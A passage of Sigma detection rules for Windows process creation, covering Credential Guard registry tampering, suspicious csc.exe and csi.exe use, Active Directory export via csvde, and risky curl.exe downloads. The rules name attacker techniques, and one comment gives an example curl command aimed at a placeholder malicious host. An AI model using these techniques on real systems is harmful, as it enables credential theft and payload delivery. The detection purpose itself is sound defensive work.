    "content": "title: Windows Credential Guard Registry Tampering Via CommandLine\nid: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\nrelated:\n    - id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\n      type: similar\n    - id: d645ef86-2396-48a1-a2b6-b629ca3f57ff\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to add, modify, or delete Windows Credential Guard related registry keys or values via command line tools such as Reg.exe or PowerShell.\n    Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\n    The rule matches suspicious command lines that target DeviceGuard or LSA registry paths and manipulate keys like EnableVirtualizationBasedSecurity, RequirePlatformSecurityFeatures, or LsaCfgFlags.\n    Such activity may indicate an attempt to disable or tamper with Credential Guard, potentially exposing sensitive credentials for misuse.\nreferences:\n    - https://woshub.com/disable-credential-guard-windows/\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-deviceguard\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli:\n        CommandLine|contains:\n            # add/modify\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # SetItem Alias\n            # delete\n            - 'delete '\n            - 'del '\n            - 'Remove-ItemProperty '\n            - 'rp '\n    selection_key_base:\n        CommandLine|contains:\n            - '\\Control\\DeviceGuard'\n            - '\\Control\\LSA'\n            - 'Software\\Policies\\Microsoft\\Windows\\DeviceGuard'\n    selection_key_specific:\n        CommandLine|contains:\n            - 'EnableVirtualizationBasedSecurity'\n            - 'RequirePlatformSecurityFeatures'\n            - 'LsaCfgFlags'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml",
    "content": "title: Dynamic .NET Compilation Via Csc.EXE\nid: dcaa3f04-70c3-427a-80b4-b870d73c94c4\nstatus: test\ndescription: Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.\nreferences:\n    - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\n    - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\n    - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\n    - https://twitter.com/gN3mes1s/status/1206874118282448897\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2019-08-24\nmodified: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\csc.exe'\n    selection_susp_location_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\' # User execution\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\' # Admin execution\n    selection_susp_location_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    selection_susp_location_3:\n        CommandLine|re: '([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$'\n    filter_main_programfiles:\n        # Note: this is a generic filter. You could baseline execution in your env for a more robust rule\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n            - 'C:\\Program Files\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_sdiagnhost:\n        ParentImage: 'C:\\Windows\\System32\\sdiagnhost.exe' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_w3p:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\w3wp.exe' # https://twitter.com/gabriele_pippi/status/1206907900268072962\n    filter_optional_chocolatey:\n        ParentImage: # Chocolatey https://chocolatey.org/\n            - 'C:\\ProgramData\\chocolatey\\choco.exe'\n            - 'C:\\ProgramData\\chocolatey\\tools\\shimgen.exe'\n    filter_optional_defender:\n        ParentCommandLine|contains: '\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection'\n    filter_optional_ansible:\n        # Note: As ansible is widely used we exclude it with this generic filter.\n        # A better option would be to filter based on script content basis or other marker while hunting\n        ParentCommandLine|contains:\n            # '{\"failed\":true,\"msg\":\"Ansible requires PowerShell v3.0 or newer\"}'\n            - 'JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw'\n            - 'cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA'\n            - 'nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA'\n    condition: selection_img and 1 of selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897\n    - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962\n    - Ansible\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml",
    "content": "title: Csc.EXE Execution Form Potentially Suspicious Parent\nid: b730a276-6b63-41b8-bcf8-55930c8fc6ee\nstatus: test\ndescription: Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.\nreferences:\n    - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\n    - https://reaqta.com/2017/11/short-journey-darkvnc/\n    - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2019-02-11\nmodified: 2024-05-27\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.defense-evasion\n    - attack.t1218.005\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\csc.exe'\n        - OriginalFileName: 'csc.exe'\n    selection_parent_generic:\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\excel.exe'\n            - '\\mshta.exe'\n            - '\\onenote.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wscript.exe'\n    selection_parent_powershell:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentCommandLine|contains:\n            - '-Encoded '\n            - 'FromBase64String'\n    selection_parent_susp_location:\n        - ParentCommandLine|re: '([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$'\n        - ParentCommandLine|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\Temp\\'\n              - '\\Temporary Internet'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    filter_main_programfiles:\n        # Note: this is a generic filter. You could baseline execution in your env for a more robust rule\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n            - 'C:\\Program Files\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_sdiagnhost:\n        ParentImage: 'C:\\Windows\\System32\\sdiagnhost.exe' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_w3p:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\w3wp.exe' # https://twitter.com/gabriele_pippi/status/1206907900268072962\n    filter_optional_chocolatey:\n        ParentImage: 'C:\\ProgramData\\chocolatey\\choco.exe' # Chocolatey https://chocolatey.org/\n    filter_optional_defender:\n        ParentCommandLine|contains: '\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection'\n    filter_optional_ansible:\n        # Note: As ansible is widely used we exclude it with this generic filter.\n        # A better option would be to filter based on script content basis or other marker while hunting\n        ParentCommandLine|contains:\n            # '{\"failed\":true,\"msg\":\"Ansible requires PowerShell v3.0 or newer\"}'\n            - 'JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw'\n            - 'cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA'\n            - 'nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA'\n    condition: selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csi_execution.yml",
    "content": "title: Suspicious Csi.exe Usage\nid: 40b95d31-1afc-469e-8d34-9a3a667d058e\nstatus: test\ndescription: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/\n    - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/\n    - https://twitter.com/Z3Jpa29z/status/1317545798981324801\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-17\nmodified: 2022-07-11\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1072\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\csi.exe'\n              - '\\rcsi.exe'\n        - OriginalFileName:\n              - 'csi.exe'\n              - 'rcsi.exe'\n    selection_cli:\n        Company: 'Microsoft Corporation'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate usage by software developers\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml",
    "content": "title: Suspicious Use of CSharp Interactive Console\nid: a9e416a8-e613-4f8b-88b8-a7d1d1af2f61\nstatus: test\ndescription: Detects the execution of CSharp interactive console by PowerShell\nreferences:\n    - https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/\nauthor: Michael R. (@nahamike01)\ndate: 2020-03-08\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csi.exe'\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n        OriginalFileName: 'csi.exe'\n    condition: selection\nfalsepositives:\n    - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csvde_export.yml",
    "content": "title: Active Directory Structure Export Via Csvde.EXE\nid: e5d36acd-acb4-4c6f-a13f-9eb203d50099\nstatus: test\ndescription: Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.\nreferences:\n    - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\n    - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\n    - https://redcanary.com/blog/msix-installers/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\csvde.exe'\n        - OriginalFileName: 'csvde.exe'\n    selection_remote:\n        CommandLine|contains: ' -f'\n    filter_import:\n        CommandLine|contains: ' -i'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml",
    "content": "title: Potential Cookies Session Hijacking\nid: 5a6e1e16-07de-48d8-8aae-faa766c05e88\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        - CommandLine|re: '\\s-c\\s'\n        - CommandLine|contains: '--cookie-jar'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml",
    "content": "title: Curl Web Request With Potential Custom User-Agent\nid: 85de1f22-d189-44e4-8239-dc276b45379b\nstatus: test\ndescription: Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accept specific \"User-Agent\" strings\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\nmodified: 2025-12-11\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: This command line would trigger the rule\n    # curl.exe -H \"User-Agent: EvilAgent\" http://malicious.example.com\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_header_flag_1:\n        CommandLine|re: '\\s-H\\s' # Must be Regex as the flag needs to be case sensitive\n    selection_header_flag_2:\n        CommandLine|contains: '--header'\n    selection_user_agent:\n        CommandLine|contains: 'User-Agent:'\n    condition: selection_img and 1 of selection_header_* and selection_user_agent\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml",
    "content": "title: File Download From IP URL Via Curl.EXE\nid: 9cc85849-3b02-4cb5-b371-3a1ff54f2218\nrelated:\n    - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043\n      type: similar\nstatus: test\ndescription: Detects file downloads directly from IP address URL using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    filter_main_ext:\n        # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043\n        CommandLine|endswith:\n            - '.bat'\n            - '.bat\"'\n            - '.dat'\n            - '.dat\"'\n            - '.dll'\n            - '.dll\"'\n            - '.exe'\n            - '.exe\"'\n            - '.gif'\n            - '.gif\"'\n            - '.hta'\n            - '.hta\"'\n            - '.jpeg'\n            - '.jpeg\"'\n            - '.log'\n            - '.log\"'\n            - '.msi'\n            - '.msi\"'\n            - '.png'\n            - '.png\"'\n            - '.ps1'\n            - '.ps1\"'\n            - '.psm1'\n            - '.psm1\"'\n            - '.vbe'\n            - '.vbe\"'\n            - '.vbs'\n            - '.vbs\"'\n            - \".bat'\"\n            - \".dat'\"\n            - \".dll'\"\n            - \".exe'\"\n            - \".gif'\"\n            - \".hta'\"\n            - \".jpeg'\"\n            - \".log'\"\n            - \".msi'\"\n            - \".png'\"\n            - \".ps1'\"\n            - \".psm1'\"\n            - \".vbe'\"\n            - \".vbs'\"\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml",
    "content": "title: Suspicious File Download From IP Via Curl.EXE\nid: 5cb299fc-5fb1-4d07-b989-0644c68b6043\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    selection_ext:\n        # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218\n        CommandLine|endswith:\n            - '.bat'\n            - '.bat\"'\n            - '.dat'\n            - '.dat\"'\n            - '.dll'\n            - '.dll\"'\n            - '.exe'\n            - '.exe\"'\n            - '.gif'\n            - '.gif\"'\n            - '.hta'\n            - '.hta\"'\n            - '.jpeg'\n            - '.jpeg\"'\n            - '.log'\n            - '.log\"'\n            - '.msi'\n            - '.msi\"'\n            - '.png'\n            - '.png\"'\n            - '.ps1'\n            - '.ps1\"'\n            - '.psm1'\n            - '.psm1\"'\n            - '.vbe'\n            - '.vbe\"'\n            - '.vbs'\n            - '.vbs\"'\n            - \".bat'\"\n            - \".dat'\"\n            - \".dll'\"\n            - \".exe'\"\n            - \".gif'\"\n            - \".hta'\"\n            - \".jpeg'\"\n            - \".log'\"\n            - \".msi'\"\n            - \".png'\"\n            - \".ps1'\"\n            - \".psm1'\"\n            - \".vbe'\"\n            - \".vbs'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml",
    "content": "title: Suspicious File Download From File Sharing Domain Via Curl.EXE\nid: 56454143-524f-49fb-b1c6-3fb8b1ad41fb\nstatus: test\ndescription: Detects potentially suspicious file download from file sharing domains using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_websites:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    selection_ext:\n        CommandLine|endswith:\n            - \".ps1\"\n            - \".ps1'\"\n            - '.ps1\"'\n            - \".dat\"\n            - \".dat'\"\n            - '.dat\"'\n            - \".msi\"\n            - \".msi'\"\n            - '.msi\"'\n            - \".bat\"\n            - \".bat'\"\n            - '.bat\"'\n            - \".exe\"\n            - \".exe'\"\n            - '.exe\"'\n            - \".vbs\"\n            - \".vbs'\"\n            - '.vbs\"'\n            - \".vbe\"\n            - \".vbe'\"\n            - '.vbe\"'\n            - \".hta\"\n            - \".hta'\"\n            - '.hta\"'\n            - \".dll\"\n            - \".dll'\"\n            - '.dll\"'\n            - \".psm1\"\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml",
    "content": "title: Insecure Transfer Via Curl.EXE\nid: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"--insecure\" flag.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-30\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        - CommandLine|re: '\\s-k\\s'\n        - CommandLine|contains: '--insecure'\n    condition: all of selection_*\nfalsepositives:\n    - Access to badly maintained internal or development systems\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml",
    "content": "title: Insecure Proxy/DOH Transfer Via Curl.EXE\nid: 2c1486f5-02e8-4f86-9099-b97f2da4ed77\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"insecure\" flag over proxy or DOH.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '--doh-insecure'\n            - '--proxy-insecure'\n    condition: all of selection_*\nfalsepositives:\n    - Access to badly maintained internal or development systems\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml",
    "content": "title: Local File Read Using Curl.EXE\nid: aa6f6ea6-0676-40dd-b510-6e46f02d8867\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        CommandLine|contains: 'file:///'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_susp_download.yml",
    "content": "title: Suspicious Curl.EXE Download\nid: e218595b-bbe7-4ee5-8a96-f32a24ad3468\nrelated:\n    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution\n      type: derived\n    - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download\n      type: similar\nstatus: test\ndescription: Detects a suspicious curl process start on Windows and outputs the requested document to a local file\nreferences:\n    - https://twitter.com/max_mal_/status/1542461200797163522\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\n    - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt\n    - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-07-03\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_curl:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_susp_locations:\n        CommandLine|contains:\n            - '%AppData%'\n            - '%Public%'\n            - '%Temp%'\n            - '%tmp%'\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Windows\\Temp\\'\n    selection_susp_extensions:\n        CommandLine|endswith:\n            - '.dll'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.temp'\n            - '.tmp'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n    filter_optional_git_windows:\n        # Example FP\n        #   CommandLine: \"C:\\Program Files\\Git\\mingw64\\bin\\curl.exe\" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} 